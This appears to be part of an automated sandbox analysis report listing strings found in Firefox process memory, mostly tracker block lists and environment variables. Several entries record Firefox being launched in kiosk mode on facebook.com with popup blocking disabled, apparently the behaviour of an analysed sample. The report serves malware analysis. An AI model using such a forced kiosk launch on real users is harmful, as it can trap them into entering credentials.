Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blockingC:\Program Files\Mozilla Firefox\firefox.exewinsta0\default equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blockingC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default# equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: FileUtils_openSafeFileOutputStreampictureinpicture%40mozilla.org:1.0.0FileUtils_closeSafeFileOutputStream://www.everestjs.net/static/st.v3.js@mozilla.org/network/file-output-stream;1://pub.doubleverify.com/signals/pub.js://track.adform.net/serving/scripts/trackpoint/@mozilla.org/addons/addon-manager-startup;1resource://gre/modules/addons/XPIProvider.jsm://c.amazon-adsystem.com/aax2/apstag.js://auth.9c9media.ca/auth/main.js://static.chartbeat.com/js/chartbeat_video.js://.imgur.com/js/vendor..bundle.jshttps://smartblock.firefox.etp/play.svg://cdn.branch.io/branch-latest.min.js*://connect.facebook.net//sdk.js*://libs.coremetrics.com/eluminate.jsFileUtils_closeAtomicFileOutputStream://web-assets.toggl.com/app/assets/scripts/.js://connect.facebook.net//all.jsresource://gre/modules/FileUtils.sys.mjs@mozilla.org/network/atomic-file-output-stream;1://static.chartbeat.com/js/chartbeat.js://static.criteo.net/js/ld/publishertag.jshttps://smartblock.firefox.etp/facebook.svg://.imgur.io/js/vendor..bundle.jswebcompat-reporter%40mozilla.org:1.5.1webcompat-reporter@mozilla.org.xpiFileUtils_openAtomicFileOutputStream://www.rva311.com/static/js/main..chunk.js@mozilla.org/network/safe-file-output-stream;1://www.google-analytics.com/analytics.js*://www.google-analytics.com/plugins/ua/ec.js://s0.2mdn.net/instream/html5/ima3.js://www.googletagservices.com/tag/js/gpt.js://adservex.media.net/videoAds.js://www.google-analytics.com/gtm/js://.moatads.com//moatheader.js://cdn.optimizely.com/public/.js://js.maxmind.com/js/apis/geoip2//geoip2.js://s.webtrends.com/js/advancedLinkTracking.js://ssl.google-analytics.com/ga.js://imasdk.googleapis.com/js/sdkloader/ima3.js://static.adsafeprotected.com/iasPET.1.js://.vidible.tv//vidible-min.js://cdn.adsafeprotected.com/iasPET.1.js://s.webtrends.com/js/webtrends.js://s.webtrends.com/js/webtrends.min.js://pagead2.googlesyndication.com/tag/js/gpt.js*resource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2954167223.000001E752A40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2959104555.000001E754590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2959104555.000001E7545E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: WinSta0\Default4=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=--kioskMOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/videoMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-browser-checkMOZ_CRASHREPORTER_RESTART_ARG_4=--disable-popup-blockingMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: _addSuggestedIndexResults_updateFlexData/flexDataArray<incrementModificationCountsetSpellcheckUserOverrideremoveDocumentStateListenereEditorEnableWrapHackMask_addSuggestedIndexResults/<fractionalDataArray is empty!isSafeToPlayDeferredEventDOM_VK_WIN_OEM_FJ_TOUROKUDOM_VK_OPEN_CURLY_BRACKETcanIncrementMinKeywordLengthurlbarView-title-separatorexperimental.hideHeuristicmaxHistoricalSearchSuggestionsWEATHER_PROVIDER_DISPLAY_NAMEstrippedUrlToTopPrefixAndTitle#recordEngagementTelemetrysuggestedIndexResultsByGroupcontextual.services.quicksuggestisURLEquivalentToResultURLfirefox-suggest-urlbar-block_checkAndSetExposurePropertiesMust provide a boolean argumentincrementMinKeywordLengthDOM_KEY_LOCATION_STANDARDfirefox-suggest-weather-titleDOM_VK_WIN_OEM_FJ_MASSHOUfirefox-suggest-weather-high-lowDismissing weather resultDOM_VK_CLOSE_CURLY_BRACKETremoveAttributeOrEquivalenteNewlinesReplaceWithSpaces.panel-header > h1 > span_createNoSyncedTabsElementtoolkit/branding/accounts.ftlappMenu-header-descriptionPanelUI-fxa-remotetabs-tabslistrecordSyncedTabsTelemetrysendTabConfiguredAndLoadingensureUnloadHandlerRegisteredget _arrowNavigableWalkerMIN_STATUS_ANIMATION_DURATIONidentity.fxaccounts.enabled_createShowMoreSyncedTabsElementappmenu-fxa-sync-and-save-data2ensureUnloadHandlerRegistered/<_transitionViews/viewRect<https://www.facebook.com/videogWindowsWithUnloadHandleropenPopup/openPopupPromise<EnsureFxAccountsWebChannel equals www.facebook.com (Facebook)
